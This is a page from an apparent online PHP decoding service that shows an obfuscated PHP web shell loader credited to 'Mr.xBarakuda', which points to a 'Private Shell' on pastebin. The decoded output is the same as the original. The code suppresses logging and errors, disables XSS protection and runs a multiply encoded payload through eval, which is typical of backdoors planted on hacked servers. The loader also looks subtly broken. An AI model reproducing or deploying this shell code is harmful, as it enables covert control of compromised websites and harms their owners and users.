Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php // Hard Cod3d By Mr.xBarakuda // Private Shell at http://pastebin.com/raw/fM3wRnbd..

Decoded Output download

<?php 
// Hard Cod3d By Mr.xBarakuda 
// Private Shell at http://pastebin.com/raw/fM3wRnbd 
session_start(); 
error_reporting(0); 
header('X-XSS-Protection: 0'); 
@set_time_limit(0); 
@set_magic_quotes_runtime(0); 
@clearstatcache(); 
@ini_set('error_log', NULL); 
@ini_set('log_errors', 0); 
@ini_set('max_execution_time', 0); 
@ini_set('output_buffering', 0); 
@ini_set('display_errors', 0); 
function KudaXxX($c0d3) { 
    
    @eval($base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode($c0d3))))))); 
} 
$HelL = "BcHRFkIwAADQ9/3FspbUEpI5xoTaGlMnxKHi/7+ie7VBe4KkmeIF8hfD7CNu0O7u0H3l/Fx5CIXOMZ7zNiR5PtW0V40yXFlmGeEO0GL9NgY/WlaV+UvR4yj37MZG+fW3myLrxD2QY1C69lCYLklERw5Uzd8GWm11CoFW0/V5aqdyf33UXoqItcWy9mINOcFF+QwoX+DuN0VOr1UqEmrJQzyPLOvWCQW4uUR+OA8GWMAf"; 
KudaXxX($HelL); 
?>

Did this file decode correctly?

Original Code

<?php
// Hard Cod3d By Mr.xBarakuda
// Private Shell at http://pastebin.com/raw/fM3wRnbd
session_start();
error_reporting(0);
header('X-XSS-Protection: 0');
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@clearstatcache();
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
function KudaXxX($c0d3) {
   
    @eval($base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode($c0d3)))))));
}
$HelL = "BcHRFkIwAADQ9/3FspbUEpI5xoTaGlMnxKHi/7+ie7VBe4KkmeIF8hfD7CNu0O7u0H3l/Fx5CIXOMZ7zNiR5PtW0V40yXFlmGeEO0GL9NgY/WlaV+UvR4yj37MZG+fW3myLrxD2QY1C69lCYLklERw5Uzd8GWm11CoFW0/V5aqdyf33UXoqItcWy9mINOcFF+QwoX+DuN0VOr1UqEmrJQzyPLOvWCQW4uUR+OA8GWMAf";
KudaXxX($HelL);
?>

Function Calls

header 1
session_start 1
error_reporting 1

Variables

None

Stats

MD5 5e16dac259045fd298a9e77947d9a523
Eval Count 0
Decode Time 114 ms